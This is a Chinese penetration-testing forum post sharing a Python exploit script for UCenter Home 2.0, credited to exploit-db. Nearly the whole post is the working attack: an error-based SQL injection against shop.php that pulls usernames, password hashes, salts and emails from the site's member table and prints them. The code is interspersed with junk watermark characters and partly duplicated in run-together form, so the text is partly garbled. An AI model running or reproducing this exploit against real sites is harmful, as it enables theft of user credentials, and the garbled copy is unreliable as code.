找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2262|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
/ ?2 H( ?' I. d5 y
! i# S# ]- Z4 U* X- v; n, P8 |& S! P% V; x2 ?" [  ]. G8 ~8 T
#!/usr/bin/env python  
7 {: c: L" `7 V , ?% q) q3 Q8 V
import sys  
! s- i! R! B  {import urllib2  ( a. i5 I1 ?7 P3 P
import re  ; v5 T' ]6 D+ [; D  i8 J6 A9 H' Z8 h

3 M1 O' m! @2 N' Z0 s% h1 U+ U" M1 Tdef info():  
) ^) D8 X# [! J# q- \( M    print 'From:http://www.exploit-db.com/exploits/14997/' 2 v, t1 N3 L) k$ d2 Q# y& k1 w- u
    print 'http://www.hake.cc/Web_loudong/'
/ `& l! h' M; m" V, N; ~6 U    print 'changed:qiaoy'  ( m7 W& {  V; Z: i' p# ]5 \
    print 'exp:'  
( m* ?4 W- c! r; B    print ' ./UCenter_Home_2.0.py site'  % _. F% Y* C' M7 j& c

/ i7 l  d6 n0 h. ?  c8 wdef main():  " S( E" }7 R5 y/ s/ f
    if len(sys.argv) != 2:  / _8 q3 ]) r1 k1 W) L
        info()  " O/ S6 D; O8 r/ \
    else:  8 \. p$ }! H; s  t' Y- l
        site = sys.argv[1]  
) O+ R+ L! u5 J; R5 k        if site[0:7] == 'http://':  
& M/ k4 f2 U- Z2 a6 S' X            sitesite =site    ~, V7 m# }0 d5 r& U/ L$ }6 F, ~4 N& v
        elif site[0:8] == 'https://':  
: J7 M$ x) Q) u: }" s            sitesite = site  
( }! S% y1 S, j7 ^9 ?2 w1 g4 A        else:  
6 Y4 Q- ^" x: S& z% |9 h% T            site = 'http://'+site  2 ~/ ]* a1 v0 g+ ^8 P
        try:  
% s* h5 R; b/ v0 [+ ~# ~7 o6 `& C            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
8 L6 ~) E; u  {" t) D2 j3 H7 h            Value = urllib2.urlopen(url).read()  7 `: s6 s7 {5 ~4 K5 R1 J% j
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
$ {: j: s" I( v7 @' j; r3 o. u            hacked = Msg.split(':')  
/ g6 A# E% n1 U. v' I, J, t5 H            print 'Name:    '+hacked[1]  . @$ H  M1 F9 b4 q2 d6 |. y
            print 'Passwd:  '+hacked[2]  
9 a8 {- q% j; N5 G3 X            print 'salt:    '+hacked[3]  
& |  `6 h* C6 M; p            print 'email:   '+hacked[4]  * |! v9 h3 }6 f' x
        except:  
: }& z8 v$ H7 [, `3 D& H            print 'Sorry,I can\'t work............'  
4 ~8 }" q( u1 e* h9 V
( }* O7 J" N  L0 g- O' Zif __name__ == '__main__':  ) @* y4 r! s8 a' y( F  z9 C( l
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表